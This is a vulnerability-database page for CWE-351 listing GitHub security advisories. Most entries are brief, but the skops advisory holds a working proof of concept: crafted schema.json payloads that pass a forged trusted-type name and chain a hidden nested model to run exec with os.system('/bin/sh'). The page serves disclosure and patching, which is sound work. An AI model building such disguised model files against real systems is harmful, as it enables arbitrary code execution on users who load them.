Common Weakness Enumeration

CWE-351

Allowed

Insufficient Type Distinction

Abstraction: Base · Status: Draft

The product does not properly distinguish between different types of elements in a way that leads to insecure behavior.

27 vulnerabilities reference this CWE, most recent first.

GHSA-M7F4-HRC6-FWG3

Vulnerability from github – Published: 2025-07-25 19:17 – Updated: 2025-07-29 23:34
VLAI
Summary
Skops has Inconsistent Trusted Type Validation that Enables Hidden `operator` Methods Execution
Details

Summary

An inconsistency in OperatorFuncNode can be exploited to hide the execution of untrusted operator.xxx methods. This can then be used in a code reuse attack to invoke seemingly safe functions and escalate to arbitrary code execution with minimal and misleading trusted types.

Note: This report focuses on operator.call as it appears to be the most interesting target, but the same technique applies to other operator methods. Moreover, focusing on a specific example is not necessary, the operator.call invocation was a zero-effort choice meant solely to demonstrate the issue. The key point is the inconsistency that allows a user to approve a type as trusted, while in reality enabling the execution of operator.xxx.

Details

The OperatorFuncNode allows calling methods belonging to the operator module and included in a trusted list of methods. However, what is returned by get_untrusted_types and checked during the load call is not exactly the same as what is actually called. Instead, it is something partially controlled by the model author. This means that the user checking the untrusted types can be tricked into thinking something benign is being used, while in reality the operator.xxx method is executed.

Let’s look at the implementation of the OperatorFuncNode:

# from io/_general.py:618-633
class OperatorFuncNode(Node):
    def __init__(
        self,
        state: dict[str, Any],
        load_context: LoadContext,
        trusted: Optional[Sequence[str]] = None,
    ) -> None:
        super().__init__(state, load_context, trusted)
        self.trusted = self._get_trusted(trusted, [])
        self.children["attrs"] = get_tree(state["attrs"], load_context, trusted=trusted)

    def _construct(self):
        op = getattr(operator, self.class_name)
        attrs = self.children["attrs"].construct()
        return op(*attrs)

As you can see, what is called during construction is operator.class_name, where class_name is the value of the "__class__" key in the schema.json file of the model.skops. However, what is returned by get_untrusted_types and checked during load is the concatenation of the __module__ and __class__ keys. Interestingly, __module__ is not used in the construction of the OperatorFuncNode, allowing an attacker to forge a module name that, when concatenated with the __class__ name, seems harmless and related to the model being loaded, while actually calling the operator.class_name function.

For example, an attacker can create a schema.json file with the following content:

{
  "__class__": "call",
  "__module__": "sklearn.linear_model._stochastic_gradient.SGDRegressor",
  "__loader__": "OperatorFuncNode",
  ...
}

What is returned by get_untrusted_types and checked during load is "sklearn.linear_model._stochastic_gradient.SGDRegressor.call", which seems harmless and related to the model being loaded. However, what is actually called during the construction of the OperatorFuncNode is operator.call, which can be used to call arbitrary functions with the provided arguments.

NOTE: There is also the possibility of a collision with a real method ending with .call. If, at some point, the user needs to trust a type like something.somewhere.call, then the attacker can use the same name while actually executing operator.call. This also means that, if at any point skops adds a default trusted element named call, the attacker can use it to execute arbitrary code by invoking operator.call with the provided arguments.

PoC

As an example, to create a model that seems perfectly harmless but allows fully arbitrary code execution, reuse code of the skops.io.loads function from the skops library. This function was chosen because, even though it is not in the default trusted list of skops, it appears perfectly harmless and appropriate in the context of loading a model with skops, hence it is likely to be trusted by users.

In particular, the OperatorFuncNode is combined with the skops.io.loads function to create a model (model.skops) that, when loaded, executes a second model load using another, hidden model zipped into the original model.skops file (hence not visible to the user unless manually unzipped and inspected). The second model is loaded with controlled arguments, allowing the attacker to specify any trusted list, thereby enabling arbitrary code execution.

Zip file structure

The zip file model.skops has the following structure:

model.skops
├── schema.json
├── my-model-evil.skops
    └── schema.json

Payload

The schema.json file of model.skops is as follows:

{
  "__class__": "call",
  "__module__": "sklearn.linear_model._stochastic_gradient.SGDRegressor",
  "__loader__": "OperatorFuncNode",
  "attrs": {
    "__class__": "tuple",
    "__module__": "builtins",
    "__loader__": "TupleNode",
    "content": [
      {
        "__class__": "loads",
        "__module__": "skops.io",
        "__loader__": "TypeNode",
        "__id__": 5
      },
      {
        "__class__": "bytes",
        "__module__": "builtins",
        "__loader__": "BytesNode",
        "file": "my-model-evil.skops",
        "__id__": 6
      },
      {
        "__class__": "list",
        "__module__": "builtins",
        "__loader__": "ListNode",
        "content": [
          {
            "__class__": "str",
            "__module__": "builtins",
            "__loader__": "JsonNode",
            "content": "\"builtins.exec\""
          },
          {
            "__class__": "str",
            "__module__": "builtins",
            "__loader__": "JsonNode",
            "content": "\"sk.call\""
          }
        ]
      }
    ],
    "__id__": 8
  },
  "__id__": 10,
  "protocol": 2,
  "_skops_version": "0.11.0"
}

Inside the zip file model.skops, there is a file my-model-evil.skops with the following content:

{
  "__class__": "call",
  "__module__": "sk",
  "__loader__": "OperatorFuncNode",
  "attrs": {
    "__class__": "tuple",
    "__module__": "builtins",
    "__loader__": "TupleNode",
    "content": [
      {
        "__class__": "exec",
        "__module__": "builtins",
        "__loader__": "TypeNode",
        "__id__": 1
      },
      {
        "__class__": "str",
        "__module__": "builtins",
        "__loader__": "JsonNode",
        "content": "\"import os; os.system('/bin/sh')\"",
        "__id__": 5,
        "is_json": true
      }
    ],
    "__id__": 8
  },
  "__id__": 10,
  "protocol": 2,
  "_skops_version": "0.11.0"
}

Since the first model loads it, the second model is loaded with the attacker-controlled trusted list ["builtins.exec", "sk.call"], allowing execution of the exec function with the provided argument without any further confirmation from the user. In this example, a shell command is executed, but the attacker can modify the payload to execute any arbitrary code.

What is shown when executing the payload

Suppose a user loads the model with the following code:

from skops.io import load, get_untrusted_types

unknown_types = get_untrusted_types(file="model.skops")
print("Unknown types", unknown_types)
input("Press enter to load the model...")
loaded = load("model.skops", trusted=unknown_types)

The output will be:

Unknown types ['sklearn.linear_model._stochastic_gradient.SGDRegressor.call', 'skops.io.loads']
Press enter to load the model...

This shows that the user is tricked into believing the model is safe, with apparently legitimate types like sklearn.linear_model._stochastic_gradient.SGDRegressor.call and skops.io.loads, while in reality, a shell is executed.

This is just one example, but the same technique can be used to execute any arbitrary code with even more misleading names.

Possible Fix

get_untrusted_types and load should verify what is actually called during the construction of the OperatorFuncNode, not just rely on the concatenation of the __module__ and __class__ keys, which do not reflect the true behavior in this case.

Impact

An attacker can exploit this vulnerability by crafting a malicious model file that, when loaded, requests trusted types that are different from those actually executed by the model. Potentially, this can escalate— as shown— to the execution of arbitrary code on the victim’s machine, requiring only the confirmation of a few seemingly safe types. The attack occurs at load time. This is particularly concerning given that skops is often used in collaborative environments and promotes a security-oriented policy.

Attachments

The complete PoC is available on GitHub at io-no/CVE-2025-54412.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "skops"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.12.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54412"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-351"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-25T19:17:34Z",
    "nvd_published_at": "2025-07-26T04:16:06Z",
    "severity": "HIGH"
  },
  "details": "## Summary\nAn inconsistency in `OperatorFuncNode` can be exploited to hide the execution of untrusted `operator.xxx` methods. This can then be used in a code reuse attack to invoke seemingly safe functions and escalate to arbitrary code execution with minimal and misleading trusted types.\n\n**Note:** This report focuses on `operator.call` as it appears to be the most interesting target, but the same technique applies to other `operator` methods. Moreover, focusing on a specific example is not necessary, the `operator.call` invocation was a zero-effort choice meant solely to demonstrate the issue. The key point is the **inconsistency** that allows a user to approve a type as trusted, while in reality enabling the execution of `operator.xxx`.\n\n\n\n## Details\n\nThe `OperatorFuncNode` allows calling methods belonging to the `operator` module and included in a trusted list of methods. However, what is returned by `get_untrusted_types` and checked during the `load` call is not exactly the same as what is actually called. Instead, it is something partially controlled by the model author. This means that the user checking the untrusted types can be tricked into thinking something benign is being used, while in reality the `operator.xxx` method is executed.\n\nLet\u2019s look at the implementation of the `OperatorFuncNode`:\n\n```python\n# from io/_general.py:618-633\nclass OperatorFuncNode(Node):\n    def __init__(\n        self,\n        state: dict[str, Any],\n        load_context: LoadContext,\n        trusted: Optional[Sequence[str]] = None,\n    ) -\u003e None:\n        super().__init__(state, load_context, trusted)\n        self.trusted = self._get_trusted(trusted, [])\n        self.children[\"attrs\"] = get_tree(state[\"attrs\"], load_context, trusted=trusted)\n\n    def _construct(self):\n        op = getattr(operator, self.class_name)\n        attrs = self.children[\"attrs\"].construct()\n        return op(*attrs)\n```\n\nAs you can see, what is called during construction is `operator.class_name`, where `class_name` is the value of the `\"__class__\"` key in the `schema.json` file of the `model.skops`. However, what is returned by `get_untrusted_types` and checked during `load` is the concatenation of the `__module__` and `__class__` keys. Interestingly, `__module__` is not used in the construction of the `OperatorFuncNode`, allowing an attacker to forge a module name that, when concatenated with the `__class__` name, seems harmless and related to the model being loaded, while actually calling the `operator.class_name` function.\n\nFor example, an attacker can create a `schema.json` file with the following content:\n\n```json\n{\n  \"__class__\": \"call\",\n  \"__module__\": \"sklearn.linear_model._stochastic_gradient.SGDRegressor\",\n  \"__loader__\": \"OperatorFuncNode\",\n  ...\n}\n```\n\nWhat is returned by `get_untrusted_types` and checked during `load` is `\"sklearn.linear_model._stochastic_gradient.SGDRegressor.call\"`, which seems harmless and related to the model being loaded. However, what is actually called during the construction of the `OperatorFuncNode` is `operator.call`, which can be used to call arbitrary functions with the provided arguments.\n\n**NOTE:** There is also the possibility of a collision with a real method ending with `.call`. If, at some point, the user needs to trust a type like `something.somewhere.call`, then the attacker can use the same name while actually executing `operator.call`. This also means that, if at any point `skops` adds a default trusted element named `call`, the attacker can use it to execute arbitrary code by invoking `operator.call` with the provided arguments.\n\n## PoC\n\nAs an example, to create a model that seems perfectly harmless but allows fully arbitrary code execution, reuse code of the `skops.io.loads` function from the `skops` library. This function was chosen because, even though it is not in the default trusted list of `skops`, it appears perfectly harmless and appropriate in the context of loading a model with `skops`, hence it is likely to be trusted by users.\n\nIn particular, the `OperatorFuncNode` is combined with the `skops.io.loads` function to create a model (`model.skops`) that, when loaded, executes a second model load using another, hidden model zipped into the original `model.skops` file (hence not visible to the user unless manually unzipped and inspected). The second model is loaded with controlled arguments, allowing the attacker to specify any trusted list, thereby enabling arbitrary code execution.\n\n### Zip file structure\n\nThe zip file `model.skops` has the following structure:\n\n```\nmodel.skops\n\u251c\u2500\u2500 schema.json\n\u251c\u2500\u2500 my-model-evil.skops\n    \u2514\u2500\u2500 schema.json\n```\n\n### Payload\n\nThe `schema.json` file of `model.skops` is as follows:\n\n```json\n{\n  \"__class__\": \"call\",\n  \"__module__\": \"sklearn.linear_model._stochastic_gradient.SGDRegressor\",\n  \"__loader__\": \"OperatorFuncNode\",\n  \"attrs\": {\n    \"__class__\": \"tuple\",\n    \"__module__\": \"builtins\",\n    \"__loader__\": \"TupleNode\",\n    \"content\": [\n      {\n        \"__class__\": \"loads\",\n        \"__module__\": \"skops.io\",\n        \"__loader__\": \"TypeNode\",\n        \"__id__\": 5\n      },\n      {\n        \"__class__\": \"bytes\",\n        \"__module__\": \"builtins\",\n        \"__loader__\": \"BytesNode\",\n        \"file\": \"my-model-evil.skops\",\n        \"__id__\": 6\n      },\n      {\n        \"__class__\": \"list\",\n        \"__module__\": \"builtins\",\n        \"__loader__\": \"ListNode\",\n        \"content\": [\n          {\n            \"__class__\": \"str\",\n            \"__module__\": \"builtins\",\n            \"__loader__\": \"JsonNode\",\n            \"content\": \"\\\"builtins.exec\\\"\"\n          },\n          {\n            \"__class__\": \"str\",\n            \"__module__\": \"builtins\",\n            \"__loader__\": \"JsonNode\",\n            \"content\": \"\\\"sk.call\\\"\"\n          }\n        ]\n      }\n    ],\n    \"__id__\": 8\n  },\n  \"__id__\": 10,\n  \"protocol\": 2,\n  \"_skops_version\": \"0.11.0\"\n}\n```\n\nInside the zip file `model.skops`, there is a file `my-model-evil.skops` with the following content:\n\n```json\n{\n  \"__class__\": \"call\",\n  \"__module__\": \"sk\",\n  \"__loader__\": \"OperatorFuncNode\",\n  \"attrs\": {\n    \"__class__\": \"tuple\",\n    \"__module__\": \"builtins\",\n    \"__loader__\": \"TupleNode\",\n    \"content\": [\n      {\n        \"__class__\": \"exec\",\n        \"__module__\": \"builtins\",\n        \"__loader__\": \"TypeNode\",\n        \"__id__\": 1\n      },\n      {\n        \"__class__\": \"str\",\n        \"__module__\": \"builtins\",\n        \"__loader__\": \"JsonNode\",\n        \"content\": \"\\\"import os; os.system(\u0027/bin/sh\u0027)\\\"\",\n        \"__id__\": 5,\n        \"is_json\": true\n      }\n    ],\n    \"__id__\": 8\n  },\n  \"__id__\": 10,\n  \"protocol\": 2,\n  \"_skops_version\": \"0.11.0\"\n}\n```\n\nSince the first model loads it, the second model is loaded with the attacker-controlled trusted list `[\"builtins.exec\", \"sk.call\"]`, allowing execution of the `exec` function with the provided argument without any further confirmation from the user. In this example, a shell command is executed, but the attacker can modify the payload to execute any arbitrary code.\n\n### What is shown when executing the payload\n\nSuppose a user loads the model with the following code:\n\n```python\nfrom skops.io import load, get_untrusted_types\n\nunknown_types = get_untrusted_types(file=\"model.skops\")\nprint(\"Unknown types\", unknown_types)\ninput(\"Press enter to load the model...\")\nloaded = load(\"model.skops\", trusted=unknown_types)\n```\n\nThe output will be:\n\n```\nUnknown types [\u0027sklearn.linear_model._stochastic_gradient.SGDRegressor.call\u0027, \u0027skops.io.loads\u0027]\nPress enter to load the model...\n```\n\nThis shows that the user is tricked into believing the model is safe, with apparently legitimate types like `sklearn.linear_model._stochastic_gradient.SGDRegressor.call` and `skops.io.loads`, while in reality, a shell is executed.\n\n**This is just one example, but the same technique can be used to execute any arbitrary code with even more  misleading names.**\n\n### Possible Fix\n\n`get_untrusted_types` and `load` should verify what is actually called during the construction of the `OperatorFuncNode`, not just rely on the concatenation of the `__module__` and `__class__` keys, which do not reflect the true behavior in this case.\n\n## Impact\nAn attacker can exploit this vulnerability by crafting a malicious model file that, when loaded, requests trusted types that are different from those actually executed by the model. Potentially, this can escalate\u2014 as shown\u2014 to the execution of arbitrary code on the victim\u2019s machine, requiring only the confirmation of a few seemingly safe types. The attack occurs at load time. This is particularly concerning given that `skops` is often used in collaborative environments and promotes a security-oriented policy.\n\n\n\n## Attachments\nThe complete PoC is available on GitHub at [io-no/CVE-2025-54412](https://github.com/io-no/CVE-Reports/tree/main/CVE-2025-54412).",
  "id": "GHSA-m7f4-hrc6-fwg3",
  "modified": "2025-07-29T23:34:26Z",
  "published": "2025-07-25T19:17:34Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/skops-dev/skops/security/advisories/GHSA-m7f4-hrc6-fwg3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54412"
    },
    {
      "type": "WEB",
      "url": "https://github.com/skops-dev/skops/commit/0aeca055509dfb48c1506870aabdd9e247adf603"
    },
    {
      "type": "WEB",
      "url": "https://drive.google.com/file/d/1c2KrjayE_S1siaou0vDmGK7_MQ7_YCUZ/view?usp=sharing"
    },
    {
      "type": "WEB",
      "url": "https://github.com/io-no/CVE-Reports/tree/main/CVE-2025-54412"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/skops-dev/skops"
    },
    {
      "type": "WEB",
      "url": "https://github.com/skops-dev/skops/releases/tag/v0.12.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Skops has Inconsistent Trusted Type Validation that Enables Hidden `operator` Methods Execution"
}

GHSA-P8PR-442Q-QF8G

Vulnerability from github – Published: 2026-07-14 15:32 – Updated: 2026-07-14 15:32
VLAI
Details

Users were able to upload files with arbitrary MIME types to forms using FileUpload or ImageUpload elements with allowedMimeTypes configured. The restriction was not enforced server-side because the MimeTypeValidator was registered during form building before concrete form definition properties were applied, resulting in the validator never being added to the processing pipeline. This issue affects TYPO3 CMS versions 14.2.0-14.3.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-15305"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-351"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-14T13:18:16Z",
    "severity": "MODERATE"
  },
  "details": "Users were able to upload files with arbitrary MIME types to forms using FileUpload or ImageUpload elements with allowedMimeTypes configured. The restriction was not enforced server-side because the MimeTypeValidator was registered during form building before concrete form definition properties were applied, resulting in the validator never being added to the processing pipeline. This issue affects TYPO3 CMS versions 14.2.0-14.3.5.",
  "id": "GHSA-p8pr-442q-qf8g",
  "modified": "2026-07-14T15:32:15Z",
  "published": "2026-07-14T15:32:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15305"
    },
    {
      "type": "WEB",
      "url": "https://typo3.org/security/advisory/typo3-core-sa-2026-020"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-PC93-2W93-6F7V

Vulnerability from github – Published: 2023-06-07 21:30 – Updated: 2024-04-04 04:39
VLAI
Details

If an attacker can trick an authenticated user into loading a maliciously crafted .zip file onto Advantech WebAccess version 8.4.5, a web shell could be used to give the attacker full control of the SCADA server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-2866"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345",
      "CWE-351"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-07T21:15:13Z",
    "severity": "HIGH"
  },
  "details": "\nIf an attacker can trick an authenticated user into loading a maliciously crafted .zip file onto Advantech WebAccess version 8.4.5, a web shell could be used to give the attacker full control of the SCADA server. \n\n",
  "id": "GHSA-pc93-2w93-6f7v",
  "modified": "2024-04-04T04:39:55Z",
  "published": "2023-06-07T21:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2866"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-150-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-PR66-WHQJ-RQ5P

Vulnerability from github – Published: 2026-04-24 00:31 – Updated: 2026-05-04 21:48
VLAI
Summary
Duplicate Advisory: OpenClaw: Discord Component Interaction Misclassifies Group DM as Direct Message
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-6336-qqw9-v6x6. This link is maintained to preserve external references.

Original Description

OpenClaw before 2026.3.31 contains a logic error in Discord component interaction routing that misclassifies group direct messages as direct messages in extensions/discord/src/monitor/agent-components-helpers.ts. Attackers can exploit this misclassification to bypass group DM policy enforcement or trigger incorrect session handling.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.3.31"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-351"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T21:48:28Z",
    "nvd_published_at": "2026-04-23T22:16:40Z",
    "severity": "LOW"
  },
  "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-6336-qqw9-v6x6. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.31 contains a logic error in Discord component interaction routing that misclassifies group direct messages as direct messages in extensions/discord/src/monitor/agent-components-helpers.ts. Attackers can exploit this misclassification to bypass group DM policy enforcement or trigger incorrect session handling.",
  "id": "GHSA-pr66-whqj-rq5p",
  "modified": "2026-05-04T21:48:29Z",
  "published": "2026-04-24T00:31:51Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6336-qqw9-v6x6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41341"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/8c83128fc38d5a3642b8ccbea58550755fdbbbaf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-component-interaction-misclassification-in-discord-extension"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: OpenClaw: Discord Component Interaction Misclassifies Group DM as Direct Message",
  "withdrawn": "2026-05-04T21:48:28Z"
}

GHSA-RWM7-RV79-M4QR

Vulnerability from github – Published: 2025-04-16 00:31 – Updated: 2025-04-16 00:31
VLAI
Details

An attacker can upload an arbitrary file instead of a plant image.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-30510"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-351"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-15T22:15:26Z",
    "severity": "CRITICAL"
  },
  "details": "An attacker can upload an arbitrary file instead of a plant image.",
  "id": "GHSA-rwm7-rv79-m4qr",
  "modified": "2025-04-16T00:31:38Z",
  "published": "2025-04-16T00:31:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30510"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-105-04"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-VGC7-VQC6-2858

Vulnerability from github – Published: 2024-05-14 18:31 – Updated: 2024-07-03 18:41
VLAI
Details

When importing resources using Web Workers, error messages would distinguish the difference between application/javascript responses and non-script responses. This could have been abused to learn information cross-origin. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-4769"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-351"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-14T18:15:14Z",
    "severity": "MODERATE"
  },
  "details": "When importing resources using Web Workers, error messages would distinguish the difference between `application/javascript` responses and non-script responses.  This could have been abused to learn information cross-origin. This vulnerability affects Firefox \u003c 126, Firefox ESR \u003c 115.11, and Thunderbird \u003c 115.11.",
  "id": "GHSA-vgc7-vqc6-2858",
  "modified": "2024-07-03T18:41:36Z",
  "published": "2024-05-14T18:31:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4769"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1886108"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00010.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00012.html"
    },
    {
      "type": "WEB",
      "url": "https://www.mozilla.org/security/advisories/mfsa2024-21"
    },
    {
      "type": "WEB",
      "url": "https://www.mozilla.org/security/advisories/mfsa2024-22"
    },
    {
      "type": "WEB",
      "url": "https://www.mozilla.org/security/advisories/mfsa2024-23"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W5X7-VWR2-4X27

Vulnerability from github – Published: 2023-08-23 18:30 – Updated: 2025-10-22 00:32
VLAI
Details

RARLabs WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file. This was exploited in the wild in April through August 2023.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-38831"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345",
      "CWE-351"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-08-23T17:15:43Z",
    "severity": "HIGH"
  },
  "details": "RARLabs WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file. This was exploited in the wild in April through August 2023.",
  "id": "GHSA-w5x7-vwr2-4x27",
  "modified": "2025-10-22T00:32:49Z",
  "published": "2023-08-23T18:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38831"
    },
    {
      "type": "WEB",
      "url": "https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability"
    },
    {
      "type": "WEB",
      "url": "https://news.ycombinator.com/item?id=37236100"
    },
    {
      "type": "WEB",
      "url": "https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-38831"
    },
    {
      "type": "WEB",
      "url": "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.